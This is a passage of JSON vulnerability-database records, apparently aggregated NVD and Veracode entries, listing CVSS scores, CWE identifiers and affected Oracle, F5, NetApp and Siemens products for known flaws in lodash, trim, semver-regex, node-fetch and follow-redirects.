"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10744"], "modified": "2021-03-16T13:57:00", "cpe": ["cpe:/a:netapp:service_level_manager:-", "cpe:/a:oracle:banking_extensibility_workbench:14.4.0", "cpe:/a:f5:big-iq_centralized_management:5.4.0", "cpe:/a:f5:big-ip_analytics:13.1.3", "cpe:/a:f5:big-iq_centralized_management:7.0.0", "cpe:/a:f5:big-iq_centralized_management:6.1.0", "cpe:/a:redhat:virtualization_manager:4.3", "cpe:/a:f5:big-ip_analytics:14.1.2", "cpe:/a:f5:big-ip_application_visibility_and_reporting:13.1.3", "cpe:/a:oracle:banking_extensibility_workbench:14.3.0", "cpe:/a:f5:iworkflow:2.3.0", "cpe:/a:f5:big-ip_analytics:12.1.5"], "id": "CVE-2019-10744", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-10744", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:f5:big-iq_centralized_management:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:virtualization_manager:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:iworkflow:2.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-iq_centralized_management:5.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-iq_centralized_management:6.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_visibility_and_reporting:13.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:14.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:service_level_manager:-:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:13.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_extensibility_workbench:14.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:12.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_extensibility_workbench:14.4.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T15:30:38", "description": "Prototype pollution attack when using _.zipObjectDeep in lodash before 4.17.20.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-07-15T17:15:00", "type": "cve", "title": "CVE-2020-8203", "cwe": ["CWE-1321"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8203"], "modified": "2022-05-12T15:01:00", "cpe": ["cpe:/a:oracle:banking_extensibility_workbench:14.2.0", "cpe:/a:oracle:banking_extensibility_workbench:14.5.0", "cpe:/a:oracle:communications_session_border_controller:cz8.4", "cpe:/a:oracle:communications_subscriber-aware_load_balancer:cz8.3", "cpe:/a:oracle:enterprise_communications_broker:pcz3.3", "cpe:/a:oracle:communications_session_border_controller:9.0", "cpe:/a:oracle:banking_trade_finance_process_management:14.5.0", "cpe:/a:oracle:primavera_gateway:18.8.12", "cpe:/a:oracle:banking_liquidity_management:14.3.0", "cpe:/a:oracle:banking_virtual_account_management:14.5.0", "cpe:/a:oracle:peoplesoft_enterprise_peopletools:8.58", "cpe:/a:oracle:banking_supply_chain_finance:14.3.0", "cpe:/a:oracle:banking_corporate_lending_process_management:14.2.0", "cpe:/a:oracle:banking_credit_facilities_process_management:14.3.0", "cpe:/a:oracle:primavera_gateway:17.12.11", "cpe:/a:oracle:banking_credit_facilities_process_management:14.2.0", "cpe:/a:oracle:enterprise_communications_broker:3.2.0", "cpe:/a:oracle:banking_virtual_account_management:14.3.0", "cpe:/a:oracle:banking_virtual_account_management:14.2.0", "cpe:/a:oracle:banking_trade_finance_process_management:14.2.0", "cpe:/a:oracle:jd_edwards_enterpriseone_tools:9.2.6.0", "cpe:/a:oracle:banking_supply_chain_finance:14.5.0", "cpe:/a:oracle:banking_trade_finance_process_management:14.3.0", "cpe:/a:oracle:peoplesoft_enterprise_peopletools:8.59", "cpe:/a:oracle:communications_cloud_native_core_policy:1.11.0", "cpe:/a:oracle:communications_session_border_controller:8.4", "cpe:/a:oracle:banking_credit_facilities_process_management:14.5.0", "cpe:/a:oracle:communications_subscriber-aware_load_balancer:cz8.4", "cpe:/a:oracle:primavera_gateway:19.12.11", "cpe:/a:oracle:communications_billing_and_revenue_management:7.5.0.23.0", "cpe:/a:oracle:banking_corporate_lending_process_management:14.3.0", "cpe:/a:oracle:banking_liquidity_management:14.2.0", "cpe:/a:oracle:communications_billing_and_revenue_management:12.0.0.3.0", "cpe:/a:oracle:primavera_gateway:20.12.7", "cpe:/a:oracle:communications_session_router:cz8.4", "cpe:/a:oracle:banking_supply_chain_finance:14.2.0", "cpe:/a:oracle:banking_corporate_lending_process_management:14.5.0", "cpe:/a:oracle:banking_extensibility_workbench:14.3.0", "cpe:/a:oracle:enterprise_communications_broker:3.3.0", "cpe:/a:oracle:banking_liquidity_management:14.5.0"], "id": "CVE-2020-8203", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-8203", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:communications_session_border_controller:cz8.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_trade_finance_process_management:14.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_liquidity_management:14.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.59:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_credit_facilities_process_management:14.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_liquidity_management:14.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_extensibility_workbench:14.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_corporate_lending_process_management:14.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_extensibility_workbench:14.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_supply_chain_finance:14.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_credit_facilities_process_management:14.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_session_border_controller:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_trade_finance_process_management:14.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_session_router:cz8.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:19.12.11:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_subscriber-aware_load_balancer:cz8.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_extensibility_workbench:14.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:17.12.11:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_trade_finance_process_management:14.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_corporate_lending_process_management:14.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_session_border_controller:8.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_corporate_lending_process_management:14.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_virtual_account_management:14.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5.0.23.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_liquidity_management:14.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:20.12.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_virtual_account_management:14.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_communications_broker:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:18.8.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_supply_chain_finance:14.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_cloud_native_core_policy:1.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_subscriber-aware_load_balancer:cz8.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_communications_broker:pcz3.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_virtual_account_management:14.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_supply_chain_finance:14.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_credit_facilities_process_management:14.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_communications_broker:3.3.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T15:29:59", "description": "All versions of package trim are vulnerable to Regular Expression Denial of Service (ReDoS) via trim().", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-27T09:15:00", "type": "cve", "title": "CVE-2020-7753", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7753"], "modified": "2022-04-26T16:31:00", "cpe": ["cpe:/a:trim_project:trim:*"], "id": "CVE-2020-7753", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-7753", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:trim_project:trim:*:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:09:49", "description": "Lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-15T13:15:00", "type": "cve", "title": "CVE-2021-23337", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-23337"], "modified": "2022-09-13T21:25:00", "cpe": ["cpe:/a:oracle:banking_corporate_lending_process_management:14.2.0", "cpe:/a:netapp:system_manager:9.0", "cpe:/a:oracle:banking_credit_facilities_process_management:14.3.0", "cpe:/a:siemens:sinec_ins:1.0", "cpe:/a:oracle:communications_cloud_native_core_policy:1.11.0", "cpe:/a:oracle:enterprise_communications_broker:3.2.0", "cpe:/a:oracle:enterprise_communications_broker:3.3.0", "cpe:/a:oracle:banking_credit_facilities_process_management:14.5.0", "cpe:/a:netapp:active_iq_unified_manager:-", "cpe:/a:oracle:peoplesoft_enterprise_peopletools:8.58", "cpe:/a:oracle:primavera_unifier:20.12", "cpe:/a:oracle:banking_corporate_lending_process_management:14.5.0", "cpe:/a:oracle:banking_supply_chain_finance:14.5.0", "cpe:/a:oracle:communications_cloud_native_core_binding_support_function:1.9.0", "cpe:/a:netapp:cloud_manager:-", "cpe:/a:oracle:primavera_gateway:17.12.11", "cpe:/a:oracle:banking_extensibility_workbench:14.3.0", "cpe:/a:oracle:banking_trade_finance_process_management:14.5.0", "cpe:/a:oracle:primavera_unifier:18.8", "cpe:/a:oracle:communications_session_border_controller:9.0", "cpe:/a:oracle:primavera_gateway:18.8.12", "cpe:/a:oracle:banking_trade_finance_process_management:14.3.0", "cpe:/a:oracle:banking_corporate_lending_process_management:14.3.0", "cpe:/a:oracle:banking_supply_chain_finance:14.2.0", "cpe:/a:oracle:banking_supply_chain_finance:14.3.0", "cpe:/a:oracle:banking_extensibility_workbench:14.5.0", "cpe:/a:oracle:health_sciences_data_management_workbench:3.0.0.0", "cpe:/a:oracle:banking_credit_facilities_process_management:14.2.0", "cpe:/a:oracle:primavera_gateway:20.12.7", "cpe:/a:oracle:financial_services_crime_and_compliance_management_studio:8.0.8.3.0", "cpe:/a:oracle:primavera_unifier:17.12", "cpe:/a:oracle:retail_customer_management_and_segmentation_foundation:19.0", "cpe:/a:oracle:primavera_unifier:19.12", "cpe:/a:oracle:communications_session_border_controller:8.4", "cpe:/a:oracle:banking_trade_finance_process_management:14.2.0", "cpe:/a:oracle:health_sciences_data_management_workbench:2.5.2.1", "cpe:/a:oracle:financial_services_crime_and_compliance_management_studio:8.0.8.2.0", "cpe:/a:oracle:primavera_gateway:19.12.11", "cpe:/a:oracle:communications_design_studio:7.4.2.0.0", "cpe:/a:oracle:communications_services_gatekeeper:7.0", "cpe:/a:oracle:banking_extensibility_workbench:14.2.0", "cpe:/a:oracle:peoplesoft_enterprise_peopletools:8.59"], "id": "CVE-2021-23337", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-23337", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:financial_services_crime_and_compliance_management_studio:8.0.8.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:health_sciences_data_management_workbench:2.5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:sinec_ins:1.0:-:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:system_manager:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_credit_facilities_process_management:14.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_extensibility_workbench:14.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_supply_chain_finance:14.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_session_border_controller:8.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_unifier:19.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_session_border_controller:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_crime_and_compliance_management_studio:8.0.8.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:19.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_trade_finance_process_management:14.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_supply_chain_finance:14.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*", "cpe:2.3:a:oracle:primavera_gateway:19.12.11:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_manager:-:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:sinec_ins:1.0:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_communications_broker:3.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_credit_facilities_process_management:14.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_cloud_native_core_binding_support_function:1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:18.8.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_corporate_lending_process_management:14.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:windows:*:*", "cpe:2.3:a:oracle:primavera_unifier:20.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_cloud_native_core_policy:1.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:linux:*:*", "cpe:2.3:a:oracle:health_sciences_data_management_workbench:3.0.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_extensibility_workbench:14.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_corporate_lending_process_management:14.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_unifier:17.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_supply_chain_finance:14.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_communications_broker:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:17.12.11:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_extensibility_workbench:14.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_design_studio:7.4.2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_credit_facilities_process_management:14.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_trade_finance_process_management:14.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:20.12.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_trade_finance_process_management:14.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_corporate_lending_process_management:14.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.59:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:27:49", "description": "semver-regex is vulnerable to Inefficient Regular Expression Complexity", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-09-15T17:15:00", "type": "cve", "title": "CVE-2021-3795", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3795"], "modified": "2022-07-29T16:54:00", "cpe": ["cpe:/a:semver-regex_project:semver-regex:4.0.0"], "id": "CVE-2021-3795", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3795", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:semver-regex_project:semver-regex:4.0.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T13:59:12", "description": "Exposure of Sensitive Information to an Unauthorized Actor in NPM follow-redirects prior to 1.14.8.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-09T11:15:00", "type": "cve", "title": "CVE-2022-0536", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0536"], "modified": "2022-02-11T20:33:00", "cpe": [], "id": "CVE-2022-0536", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-0536", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-02-09T14:16:39", "description": "Denial of Service in GitHub repository node-fetch/node-fetch prior to 3.2.10.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-01T15:15:00", "type": "cve", "title": "CVE-2022-2596", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-2596"], "modified": "2022-08-05T03:42:00", "cpe": [], "id": "CVE-2022-2596", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-2596", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2023-02-08T15:39:26", "description": "node-fetch is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-01-16T17:15:00", "type": "cve", "title": "CVE-2022-0235", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0235"], "modified": "2023-02-03T19:16:00", "cpe": ["cpe:/o:debian:debian_linux:10.0", "cpe:/a:siemens:sinec_ins:1.0"], "id": "CVE-2022-0235", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-0235", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:siemens:sinec_ins:1.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:sinec_ins:1.0:-:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T13:58:12", "description": "follow-redirects is vulnerable to Exposure of Private Personal Information to an Unauthorized Actor", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-01-10T20:15:00", "type": "cve", "title": "CVE-2022-0155", "cwe": ["CWE-359"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0155"], "modified": "2022-10-28T17:54:00", "cpe": ["cpe:/a:siemens:sinec_ins:1.0"], "id": "CVE-2022-0155", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-0155", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:siemens:sinec_ins:1.0:-:*:*:*:*:*:*", "cpe:2.3:a:siemens:sinec_ins:1.0:sp1:*:*:*:*:*:*"]}], "veracode": [{"lastseen": "2022-06-16T07:59:37", "description": "semver-regex is vulnerable to regular expression denial of service. The vulnerability exists in `semverRegex` function in `index.js` due to improper use of regular expressions which allows an attacker to cause a ReDos. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-06-03T09:04:17", "type": "veracode", "title": "Regular Expression Denial Of Service (ReDoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43307"], "modified": "2022-06-09T20:18:20", "id": "VERACODE:35860", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-35860/summary", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-06-07T02:23:50", "description": "ramda is vulnerable to prototype pollution. An attacker can inject properties into existing construct prototypes via the `_curry2` function in the `mapObjIndexed.js` and modify attributes such as `__proto__`, `constructor`, and `prototype`. This vulnerability has been disputed and is pending further information.\n", 